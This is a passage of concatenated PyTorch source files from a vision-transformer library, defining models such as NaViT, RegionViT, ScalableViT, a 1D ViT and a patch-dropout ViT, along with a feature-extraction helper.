x x = ff(x) + x return self.norm(x) class NaViT(Module): def __init__( self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0., token_dropout_prob: float | None = None ): super().__init__() image_height, image_width = pair(image_size) # what percent of tokens to dropout # if int or float given, then assume constant dropout prob # otherwise accept a callback that in turn calculates dropout prob from height and width self.token_dropout_prob = token_dropout_prob # calculate patching related stuff assert divisible_by(image_height, patch_size) and divisible_by(image_width, patch_size), 'Image dimensions must be divisible by the patch size.' patch_height_dim, patch_width_dim = (image_height // patch_size), (image_width // patch_size) patch_dim = channels * (patch_size ** 2) self.channels = channels self.patch_size = patch_size self.to_patches = Rearrange('c (h p1) (w p2) -> h w (c p1 p2)', p1 = patch_size, p2 = patch_size) self.to_patch_embedding = nn.Sequential( nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.pos_embed_height = nn.Parameter(torch.randn(patch_height_dim, dim)) self.pos_embed_width = nn.Parameter(torch.randn(patch_width_dim, dim)) self.dropout = nn.Dropout(emb_dropout) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout) # final attention pooling queries self.attn_pool_queries = nn.Parameter(torch.randn(dim)) self.attn_pool = Attention(dim = dim, dim_head = dim_head, heads = heads) # output to logits self.to_latent = nn.Identity() self.mlp_head = nn.Sequential( nn.LayerNorm(dim, bias = False), nn.Linear(dim, num_classes, bias = False) ) @property def device(self): return next(self.parameters()).device def forward( self, images: List[Tensor], # different resolution images ): batch, device = len(images), self.device arange = partial(torch.arange, device = device) assert all([image.ndim == 3 and image.shape[0] == self.channels for image in images]), f'all images must have {self.channels} channels and number of dimensions of 3 (channels, height, width)' all_patches = [self.to_patches(image) for image in images] # prepare factorized positional embedding height width indices positions = [] for patches in all_patches: patch_height, patch_width = patches.shape[:2] hw_indices = torch.stack(torch.meshgrid((arange(patch_height), arange(patch_width)), indexing = 'ij'), dim = -1) hw_indices = rearrange(hw_indices, 'h w c -> (h w) c') positions.append(hw_indices) # need the sizes to compute token dropout + positional embedding tokens = [rearrange(patches, 'h w d -> (h w) d') for patches in all_patches] # handle token dropout seq_lens = torch.tensor([i.shape[0] for i in tokens], device = device) if self.training and self.token_dropout_prob > 0: keep_seq_lens = ((1. - self.token_dropout_prob) * seq_lens).int().clamp(min = 1) kept_tokens = [] kept_positions = [] for one_image_tokens, one_image_positions, seq_len, num_keep in zip(tokens, positions, seq_lens, keep_seq_lens): keep_indices = torch.randn((seq_len,), device = device).topk(num_keep, dim = -1).indices one_image_kept_tokens = one_image_tokens[keep_indices] one_image_kept_positions = one_image_positions[keep_indices] kept_tokens.append(one_image_kept_tokens) kept_positions.append(one_image_kept_positions) tokens, positions, seq_lens = kept_tokens, kept_positions, keep_seq_lens # add all height and width factorized positions height_indices, width_indices = torch.cat(positions).unbind(dim = -1) height_embed, width_embed = self.pos_embed_height[height_indices], self.pos_embed_width[width_indices] pos_embed = height_embed + width_embed # use nested tensor for transformers and save on padding computation tokens = torch.cat(tokens) # linear projection to patch embeddings tokens = self.to_patch_embedding(tokens) # absolute positions tokens = tokens + pos_embed tokens = nested_tensor(tokens.split(seq_lens.tolist()), layout = torch.jagged, device = device) # embedding dropout tokens = self.dropout(tokens) # transformer tokens = self.transformer(tokens) # attention pooling # will use a jagged tensor for queries, as SDPA requires all inputs to be jagged, or not attn_pool_queries = [rearrange(self.attn_pool_queries, '... -> 1 ...')] * batch attn_pool_queries = nested_tensor(attn_pool_queries, layout = torch.jagged) pooled = self.attn_pool(attn_pool_queries, tokens) # back to unjagged logits = torch.stack(pooled.unbind()) logits = rearrange(logits, 'b 1 d -> b d') logits = self.to_latent(logits) return self.mlp_head(logits) # quick test if __name__ == '__main__': v = NaViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048, dropout = 0., emb_dropout = 0., token_dropout_prob = 0.1 ) # 5 images of different resolutions - List[Tensor] images = [ torch.randn(3, 256, 256), torch.randn(3, 128, 128), torch.randn(3, 128, 256), torch.randn(3, 256, 128), torch.randn(3, 64, 256) ] assert v(images).shape == (5, 1000) File: vit_pytorch/simple_flash_attn_vit.py from collections import namedtuple from packaging import version import torch import torch.nn.functional as F from torch import nn from einops import rearrange from einops.layers.torch import Rearrange # constants Config = namedtuple('FlashAttentionConfig', ['enable_flash', 'enable_math', 'enable_mem_efficient']) # helpers def pair(t): return t if isinstance(t, tuple) else (t, t) def posemb_sincos_2d(patches, temperature = 10000, dtype = torch.float32): _, h, w, dim, device, dtype = *patches.shape, patches.device, patches.dtype y, x = torch.meshgrid(torch.arange(h, device = device), torch.arange(w, device = device), indexing = 'ij') assert (dim % 4) == 0, 'feature dimension must be multiple of 4 for sincos emb' omega = torch.arange(dim // 4, device = device) / (dim // 4 - 1) omega = 1. / (temperature ** omega) y = y.flatten()[:, None] * omega[None, :] x = x.flatten()[:, None] * omega[None, :] pe = torch.cat((x.sin(), x.cos(), y.sin(), y.cos()), dim = 1) return pe.type(dtype) # main class class Attend(nn.Module): def __init__(self, use_flash = False): super().__init__() self.use_flash = use_flash assert not (use_flash and version.parse(torch.__version__) < version.parse('2.0.0')), 'in order to use flash attention, you must be using pytorch 2.0 or above' # determine efficient attention configs for cuda and cpu self.cpu_config = Config(True, True, True) self.cuda_config = None if not torch.cuda.is_available() or not use_flash: return device_properties = torch.cuda.get_device_properties(torch.device('cuda')) if device_properties.major == 8 and device_properties.minor == 0: self.cuda_config = Config(True, False, False) else: self.cuda_config = Config(False, True, True) def flash_attn(self, q, k, v): config = self.cuda_config if q.is_cuda else self.cpu_config # flash attention - https://arxiv.org/abs/2205.14135 with torch.backends.cuda.sdp_kernel(**config._asdict()): out = F.scaled_dot_product_attention(q, k, v) return out def forward(self, q, k, v): n, device, scale = q.shape[-2], q.device, q.shape[-1] ** -0.5 if self.use_flash: return self.flash_attn(q, k, v) # similarity sim = einsum("b h i d, b j d -> b h i j", q, k) * scale # attention attn = sim.softmax(dim=-1) # aggregate values out = einsum("b h i j, b j d -> b h i d", attn, v) return out # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Linear(hidden_dim, dim), ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, use_flash = True): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = Attend(use_flash = use_flash) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Linear(inner_dim, dim, bias = False) def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) out = self.attend(q, k, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, use_flash): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, use_flash = use_flash), FeedForward(dim, mlp_dim) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return x class SimpleViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, channels = 3, dim_head = 64, use_flash = True): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' num_patches = (image_height // patch_height) * (image_width // patch_width) patch_dim = channels * patch_height * patch_width self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b h w (p1 p2 c)', p1 = patch_height, p2 = patch_width), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, use_flash) self.to_latent = nn.Identity() self.linear_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, img): *_, h, w, dtype = *img.shape, img.dtype x = self.to_patch_embedding(img) pe = posemb_sincos_2d(x) x = rearrange(x, 'b ... d -> b (...) d') + pe x = self.transformer(x) x = x.mean(dim = 1) x = self.to_latent(x) return self.linear_head(x) File: vit_pytorch/regionvit.py import torch from torch import nn, einsum from einops import rearrange from einops.layers.torch import Rearrange, Reduce import torch.nn.functional as F # helpers def exists(val): return val is not None def default(val, d): return val if exists(val) else d def cast_tuple(val, length = 1): return val if isinstance(val, tuple) else ((val,) * length) def divisible_by(val, d): return (val % d) == 0 # helper classes class Downsample(nn.Module): def __init__(self, dim_in, dim_out): super().__init__() self.conv = nn.Conv2d(dim_in, dim_out, 3, stride = 2, padding = 1) def forward(self, x): return self.conv(x) class PEG(nn.Module): def __init__(self, dim, kernel_size = 3): super().__init__() self.proj = nn.Conv2d(dim, dim, kernel_size = kernel_size, padding = kernel_size // 2, groups = dim, stride = 1) def forward(self, x): return self.proj(x) + x # transformer classes def FeedForward(dim, mult = 4, dropout = 0.): return nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, dim * mult, 1), nn.GELU(), nn.Dropout(dropout), nn.Linear(dim * mult, dim, 1) ) class Attention(nn.Module): def __init__( self, dim, heads = 4, dim_head = 32, dropout = 0. ): super().__init__() self.heads = heads self.scale = dim_head ** -0.5 inner_dim = dim_head * heads self.norm = nn.LayerNorm(dim) self.dropout = nn.Dropout(dropout) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) def forward(self, x, rel_pos_bias = None): h = self.heads # prenorm x = self.norm(x) q, k, v = self.to_qkv(x).chunk(3, dim = -1) # split heads q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), (q, k, v)) q = q * self.scale sim = einsum('b h i d, b h j d -> b h i j', q, k) # add relative positional bias for local tokens if exists(rel_pos_bias): sim = sim + rel_pos_bias attn = sim.softmax(dim = -1) attn = self.dropout(attn) # merge heads out = einsum('b h i j, b h j d -> b h i d', attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class R2LTransformer(nn.Module): def __init__( self, dim, *, window_size, depth = 4, heads = 4, dim_head = 32, attn_dropout = 0., ff_dropout = 0., ): super().__init__() self.layers = nn.ModuleList([]) self.window_size = window_size rel_positions = 2 * window_size - 1 self.local_rel_pos_bias = nn.Embedding(rel_positions ** 2, heads) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = attn_dropout), FeedForward(dim, dropout = ff_dropout) ])) def forward(self, local_tokens, region_tokens): device = local_tokens.device lh, lw = local_tokens.shape[-2:] rh, rw = region_tokens.shape[-2:] window_size_h, window_size_w = lh // rh, lw // rw local_tokens = rearrange(local_tokens, 'b c h w -> b (h w) c') region_tokens = rearrange(region_tokens, 'b c h w -> b (h w) c') # calculate local relative positional bias h_range = torch.arange(window_size_h, device = device) w_range = torch.arange(window_size_w, device = device) grid_x, grid_y = torch.meshgrid(h_range, w_range, indexing = 'ij') grid = torch.stack((grid_x, grid_y)) grid = rearrange(grid, 'c h w -> c (h w)') grid = (grid[:, :, None] - grid[:, None, :]) + (self.window_size - 1) bias_indices = (grid * torch.tensor([1, self.window_size * 2 - 1], device = device)[:, None, None]).sum(dim = 0) rel_pos_bias = self.local_rel_pos_bias(bias_indices) rel_pos_bias = rearrange(rel_pos_bias, 'i j h -> () h i j') rel_pos_bias = F.pad(rel_pos_bias, (1, 0, 1, 0), value = 0) # go through r2l transformer layers for attn, ff in self.layers: region_tokens = attn(region_tokens) + region_tokens # concat region tokens to local tokens local_tokens = rearrange(local_tokens, 'b (h w) d -> b h w d', h = lh) local_tokens = rearrange(local_tokens, 'b (h p1) (w p2) d -> (b h w) (p1 p2) d', p1 = window_size_h, p2 = window_size_w) region_tokens = rearrange(region_tokens, 'b n d -> (b n) () d') # do self attention on local tokens, along with its regional token region_and_local_tokens = torch.cat((region_tokens, local_tokens), dim = 1) region_and_local_tokens = attn(region_and_local_tokens, rel_pos_bias = rel_pos_bias) + region_and_local_tokens # feedforward region_and_local_tokens = ff(region_and_local_tokens) + region_and_local_tokens # split back local and regional tokens region_tokens, local_tokens = region_and_local_tokens[:, :1], region_and_local_tokens[:, 1:] local_tokens = rearrange(local_tokens, '(b h w) (p1 p2) d -> b (h p1 w p2) d', h = lh // window_size_h, w = lw // window_size_w, p1 = window_size_h) region_tokens = rearrange(region_tokens, '(b n) () d -> b n d', n = rh * rw) local_tokens = rearrange(local_tokens, 'b (h w) c -> b c h w', h = lh, w = lw) region_tokens = rearrange(region_tokens, 'b (h w) c -> b c h w', h = rh, w = rw) return local_tokens, region_tokens # classes class RegionViT(nn.Module): def __init__( self, *, dim = (64, 128, 256, 512), depth = (2, 2, 8, 2), window_size = 7, num_classes = 1000, tokenize_local_3_conv = False, local_patch_size = 4, use_peg = False, attn_dropout = 0., ff_dropout = 0., channels = 3, ): super().__init__() dim = cast_tuple(dim, 4) depth = cast_tuple(depth, 4) assert len(dim) == 4, 'dim needs to be a single value or a tuple of length 4' assert len(depth) == 4, 'depth needs to be a single value or a tuple of length 4' self.local_patch_size = local_patch_size region_patch_size = local_patch_size * window_size self.region_patch_size = local_patch_size * window_size init_dim, *_, last_dim = dim # local and region encoders if tokenize_local_3_conv: self.local_encoder = nn.Sequential( nn.Conv2d(3, init_dim, 3, 2, 1), nn.LayerNorm(init_dim), nn.GELU(), nn.Conv2d(init_dim, init_dim, 3, 2, 1), nn.LayerNorm(init_dim), nn.GELU(), nn.Conv2d(init_dim, init_dim, 3, 1, 1) ) else: self.local_encoder = nn.Conv2d(3, init_dim, 8, 4, 3) self.region_encoder = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (c p1 p2) h w', p1 = region_patch_size, p2 = region_patch_size), nn.Conv2d((region_patch_size ** 2) * channels, init_dim, 1) ) # layers current_dim = init_dim self.layers = nn.ModuleList([]) for ind, dim, num_layers in zip(range(4), dim, depth): not_first = ind != 0 need_downsample = not_first need_peg = not_first and use_peg self.layers.append(nn.ModuleList([ Downsample(current_dim, dim) if need_downsample else nn.Identity(), PEG(dim) if need_peg else nn.Identity(), R2LTransformer(dim, depth = num_layers, window_size = window_size, attn_dropout = attn_dropout, ff_dropout = ff_dropout) ])) current_dim = dim # final logits self.to_logits = nn.Sequential( Reduce('b c h w -> b c', 'mean'), nn.LayerNorm(last_dim), nn.Linear(last_dim, num_classes) ) def forward(self, x): *_, h, w = x.shape assert divisible_by(h, self.region_patch_size) and divisible_by(w, self.region_patch_size), 'height and width must be divisible by region patch size' assert divisible_by(h, self.local_patch_size) and divisible_by(w, self.local_patch_size), 'height and width must be divisible by local patch size' local_tokens = self.local_encoder(x) region_tokens = self.region_encoder(x) for down, peg, transformer in self.layers: local_tokens, region_tokens = down(local_tokens), down(region_tokens) local_tokens = peg(local_tokens) local_tokens, region_tokens = transformer(local_tokens, region_tokens) return self.to_logits(region_tokens) File: vit_pytorch/extractor.py import torch from torch import nn def exists(val): return val is not None def identity(t): return t def clone_and_detach(t): return t.clone().detach() def apply_tuple_or_single(fn, val): if isinstance(val, tuple): return tuple(map(fn, val)) return fn(val) class Extractor(nn.Module): def __init__( self, vit, device = None, layer = None, layer_name = 'transformer', layer_save_input = False, return_embeddings_only = False, detach = True ): super().__init__() self.vit = vit self.data = None self.latents = None self.hooks = [] self.hook_registered = False self.ejected = False self.device = device self.layer = layer self.layer_name = layer_name self.layer_save_input = layer_save_input # whether to save input or output of layer self.return_embeddings_only = return_embeddings_only self.detach_fn = clone_and_detach if detach else identity def _hook(self, _, inputs, output): layer_output = inputs if self.layer_save_input else output self.latents = apply_tuple_or_single(self.detach_fn, layer_output) def _register_hook(self): if not exists(self.layer): assert hasattr(self.vit, self.layer_name), 'layer whose output to take as embedding not found in vision transformer' layer = getattr(self.vit, self.layer_name) else: layer = self.layer handle = layer.register_forward_hook(self._hook) self.hooks.append(handle) self.hook_registered = True def eject(self): self.ejected = True for hook in self.hooks: hook.remove() self.hooks.clear() return self.vit def clear(self): del self.latents self.latents = None def forward( self, img, return_embeddings_only = False ): assert not self.ejected, 'extractor has been ejected, cannot be used anymore' self.clear() if not self.hook_registered: self._register_hook() pred = self.vit(img) target_device = self.device if exists(self.device) else img.device latents = apply_tuple_or_single(lambda t: t.to(target_device), self.latents) if return_embeddings_only or self.return_embeddings_only: return latents return pred, latents File: vit_pytorch/scalable_vit.py from functools import partial import torch from torch import nn from einops import rearrange, repeat from einops.layers.torch import Rearrange, Reduce # helpers def exists(val): return val is not None def default(val, d): return val if exists(val) else d def pair(t): return t if isinstance(t, tuple) else (t, t) def cast_tuple(val, length = 1): return val if isinstance(val, tuple) else ((val,) * length) # helper classes class ChanLayerNorm(nn.Module): def __init__(self, dim, eps = 1e-5): super().__init__() self.eps = eps self.g = nn.Parameter(torch.ones(1, dim, 1, 1)) self.b = nn.Parameter(torch.zeros(1, dim, 1, 1)) def forward(self, x): var = torch.var(x, dim = 1, unbiased = False, keepdim = True) mean = torch.mean(x, dim = 1, keepdim = True) return (x - mean) / (var + self.eps).sqrt() * self.g + self.b class Downsample(nn.Module): def __init__(self, dim_in, dim_out): super().__init__() self.conv = nn.Conv2d(dim_in, dim_out, 3, stride = 2, padding = 1) def forward(self, x): return self.conv(x) class PEG(nn.Module): def __init__(self, dim, kernel_size = 3): super().__init__() self.proj = nn.Conv2d(dim, dim, kernel_size = kernel_size, padding = kernel_size // 2, groups = dim, stride = 1) def forward(self, x): return self.proj(x) + x # feedforward class FeedForward(nn.Module): def __init__(self, dim, expansion_factor = 4, dropout = 0.): super().__init__() inner_dim = dim * expansion_factor self.net = nn.Sequential( ChanLayerNorm(dim), nn.Conv2d(dim, inner_dim, 1), nn.GELU(), nn.Dropout(dropout), nn.Conv2d(inner_dim, dim, 1), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) # attention class ScalableSelfAttention(nn.Module): def __init__( self, dim, heads = 8, dim_key = 32, dim_value = 32, dropout = 0., reduction_factor = 1 ): super().__init__() self.heads = heads self.scale = dim_key ** -0.5 self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.norm = ChanLayerNorm(dim) self.to_q = nn.Conv2d(dim, dim_key * heads, 1, bias = False) self.to_k = nn.Conv2d(dim, dim_key * heads, reduction_factor, stride = reduction_factor, bias = False) self.to_v = nn.Conv2d(dim, dim_value * heads, reduction_factor, stride = reduction_factor, bias = False) self.to_out = nn.Sequential( nn.Conv2d(dim_value * heads, dim, 1), nn.Dropout(dropout) ) def forward(self, x): height, width, heads = *x.shape[-2:], self.heads x = self.norm(x) q, k, v = self.to_q(x), self.to_k(x), self.to_v(x) # split out heads q, k, v = map(lambda t: rearrange(t, 'b (h d) ... -> b h (...) d', h = heads), (q, k, v)) # similarity dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale # attention attn = self.attend(dots) attn = self.dropout(attn) # aggregate values out = torch.matmul(attn, v) # merge back heads out = rearrange(out, 'b h (x y) d -> b (h d) x y', x = height, y = width) return self.to_out(out) class InteractiveWindowedSelfAttention(nn.Module): def __init__( self, dim, window_size, heads = 8, dim_key = 32, dim_value = 32, dropout = 0. ): super().__init__() self.heads = heads self.scale = dim_key ** -0.5 self.window_size = window_size self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.norm = ChanLayerNorm(dim) self.local_interactive_module = nn.Conv2d(dim_value * heads, dim_value * heads, 3, padding = 1) self.to_q = nn.Conv2d(dim, dim_key * heads, 1, bias = False) self.to_k = nn.Conv2d(dim, dim_key * heads, 1, bias = False) self.to_v = nn.Conv2d(dim, dim_value * heads, 1, bias = False) self.to_out = nn.Sequential( nn.Conv2d(dim_value * heads, dim, 1), nn.Dropout(dropout) ) def forward(self, x): height, width, heads, wsz = *x.shape[-2:], self.heads, self.window_size x = self.norm(x) wsz_h, wsz_w = default(wsz, height), default(wsz, width) assert (height % wsz_h) == 0 and (width % wsz_w) == 0, f'height ({height}) or width ({width}) of feature map is not divisible by the window size ({wsz_h}, {wsz_w})' q, k, v = self.to_q(x), self.to_k(x), self.to_v(x) # get output of LIM local_out = self.local_interactive_module(v) # divide into window (and split out heads) for efficient self attention q, k, v = map(lambda t: rearrange(t, 'b (h d) (x w1) (y w2) -> (b x y) h (w1 w2) d', h = heads, w1 = wsz_h, w2 = wsz_w), (q, k, v)) # similarity dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale # attention attn = self.attend(dots) attn = self.dropout(attn) # aggregate values out = torch.matmul(attn, v) # reshape the windows back to full feature map (and merge heads) out = rearrange(out, '(b x y) h (w1 w2) d -> b (h d) (x w1) (y w2)', x = height // wsz_h, y = width // wsz_w, w1 = wsz_h, w2 = wsz_w) # add LIM output out = out + local_out return self.to_out(out) class Transformer(nn.Module): def __init__( self, dim, depth, heads = 8, ff_expansion_factor = 4, dropout = 0., ssa_dim_key = 32, ssa_dim_value = 32, ssa_reduction_factor = 1, iwsa_dim_key = 32, iwsa_dim_value = 32, iwsa_window_size = None, norm_output = True ): super().__init__() self.layers = nn.ModuleList([]) for ind in range(depth): is_first = ind == 0 self.layers.append(nn.ModuleList([ ScalableSelfAttention(dim, heads = heads, dim_key = ssa_dim_key, dim_value = ssa_dim_value, reduction_factor = ssa_reduction_factor, dropout = dropout), FeedForward(dim, expansion_factor = ff_expansion_factor, dropout = dropout), PEG(dim) if is_first else None, FeedForward(dim, expansion_factor = ff_expansion_factor, dropout = dropout), InteractiveWindowedSelfAttention(dim, heads = heads, dim_key = iwsa_dim_key, dim_value = iwsa_dim_value, window_size = iwsa_window_size, dropout = dropout) ])) self.norm = ChanLayerNorm(dim) if norm_output else nn.Identity() def forward(self, x): for ssa, ff1, peg, iwsa, ff2 in self.layers: x = ssa(x) + x x = ff1(x) + x if exists(peg): x = peg(x) x = iwsa(x) + x x = ff2(x) + x return self.norm(x) class ScalableViT(nn.Module): def __init__( self, *, num_classes, dim, depth, heads, reduction_factor, window_size = None, iwsa_dim_key = 32, iwsa_dim_value = 32, ssa_dim_key = 32, ssa_dim_value = 32, ff_expansion_factor = 4, channels = 3, dropout = 0. ): super().__init__() self.to_patches = nn.Conv2d(channels, dim, 7, stride = 4, padding = 3) assert isinstance(depth, tuple), 'depth needs to be tuple if integers indicating number of transformer blocks at that stage' num_stages = len(depth) dims = tuple(map(lambda i: (2 ** i) * dim, range(num_stages))) hyperparams_per_stage = [ heads, ssa_dim_key, ssa_dim_value, reduction_factor, iwsa_dim_key, iwsa_dim_value, window_size, ] hyperparams_per_stage = list(map(partial(cast_tuple, length = num_stages), hyperparams_per_stage)) assert all(tuple(map(lambda arr: len(arr) == num_stages, hyperparams_per_stage))) self.layers = nn.ModuleList([]) for ind, (layer_dim, layer_depth, layer_heads, layer_ssa_dim_key, layer_ssa_dim_value, layer_ssa_reduction_factor, layer_iwsa_dim_key, layer_iwsa_dim_value, layer_window_size) in enumerate(zip(dims, depth, *hyperparams_per_stage)): is_last = ind == (num_stages - 1) self.layers.append(nn.ModuleList([ Transformer(dim = layer_dim, depth = layer_depth, heads = layer_heads, ff_expansion_factor = ff_expansion_factor, dropout = dropout, ssa_dim_key = layer_ssa_dim_key, ssa_dim_value = layer_ssa_dim_value, ssa_reduction_factor = layer_ssa_reduction_factor, iwsa_dim_key = layer_iwsa_dim_key, iwsa_dim_value = layer_iwsa_dim_value, iwsa_window_size = layer_window_size, norm_output = not is_last), Downsample(layer_dim, layer_dim * 2) if not is_last else None ])) self.mlp_head = nn.Sequential( Reduce('b d h w -> b d', 'mean'), nn.LayerNorm(dims[-1]), nn.Linear(dims[-1], num_classes) ) def forward(self, img): x = self.to_patches(img) for transformer, downsample in self.layers: x = transformer(x) if exists(downsample): x = downsample(x) return self.mlp_head(x) File: vit_pytorch/simple_vit_1d.py import torch from torch import nn from einops import rearrange from einops.layers.torch import Rearrange # helpers def posemb_sincos_1d(patches, temperature = 10000, dtype = torch.float32): _, n, dim, device, dtype = *patches.shape, patches.device, patches.dtype n = torch.arange(n, device = device) assert (dim % 2) == 0, 'feature dimension must be multiple of 2 for sincos emb' omega = torch.arange(dim // 2, device = device) / (dim // 2 - 1) omega = 1. / (temperature ** omega) n = n.flatten()[:, None] * omega[None, :] pe = torch.cat((n.sin(), n.cos()), dim = 1) return pe.type(dtype) # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Linear(hidden_dim, dim), ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Linear(inner_dim, dim, bias = False) def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = self.attend(dots) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim): super().__init__() self.norm = nn.LayerNorm(dim) self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head), FeedForward(dim, mlp_dim) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return self.norm(x) class SimpleViT(nn.Module): def __init__(self, *, seq_len, patch_size, num_classes, dim, depth, heads, mlp_dim, channels = 3, dim_head = 64): super().__init__() assert seq_len % patch_size == 0 num_patches = seq_len // patch_size patch_dim = channels * patch_size self.to_patch_embedding = nn.Sequential( Rearrange('b c (n p) -> b n (p c)', p = patch_size), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim) self.to_latent = nn.Identity() self.linear_head = nn.Linear(dim, num_classes) def forward(self, series): *_, n, dtype = *series.shape, series.dtype x = self.to_patch_embedding(series) pe = posemb_sincos_1d(x) x = rearrange(x, 'b ... d -> b (...) d') + pe x = self.transformer(x) x = x.mean(dim = 1) x = self.to_latent(x) return self.linear_head(x) if __name__ == '__main__': v = SimpleViT( seq_len = 256, patch_size = 16, num_classes = 1000, dim = 1024, depth = 6, heads = 8, mlp_dim = 2048 ) time_series = torch.randn(4, 3, 256) logits = v(time_series) # (4, 1000) File: vit_pytorch/simple_vit_with_patch_dropout.py import torch from torch import nn from einops import rearrange from einops.layers.torch import Rearrange # helpers def pair(t): return t if isinstance(t, tuple) else (t, t) def posemb_sincos_2d(patches, temperature = 10000, dtype = torch.float32): _, h, w, dim, device, dtype = *patches.shape, patches.device, patches.dtype y, x = torch.meshgrid(torch.arange(h, device = device), torch.arange(w, device = device), indexing = 'ij') assert (dim % 4) == 0, 'feature dimension must be multiple of 4 for sincos emb' omega = torch.arange(dim // 4, device = device) / (dim // 4 - 1) omega = 1. / (temperature ** omega) y = y.flatten()[:, None] * omega[None, :] x = x.flatten()[:, None] * omega[None, :] pe = torch.cat((x.sin(), x.cos(), y.sin(), y.cos()), dim = 1) return pe.type(dtype) # patch dropout class PatchDropout(nn.Module): def __init__(self, prob): super().__init__() assert 0 <= prob < 1. self.prob = prob def forward(self, x): if not self.training or self.prob == 0.: return x b, n, _, device = *x.shape, x.device batch_indices = torch.arange(b, device = device) batch_indices = rearrange(batch_indices, '... -> ... 1') num_patches_keep = max(1, int(n * (1 - self.prob))) patch_indices_keep = torch.randn(b, n, device = device).topk(num_patches_keep, dim = -1).indices return x[batch_indices, patch_indices_keep] # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Linear(hidden_dim, dim), ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Linear(inner_dim, dim, bias = False) def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = self.attend(dots) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim): super().__init__() self.norm = nn.LayerNorm(dim) self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head), FeedForward(dim, mlp_dim) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return self.norm(x) class SimpleViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, channels = 3, dim_head = 64, patch_dropout = 0.5): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image 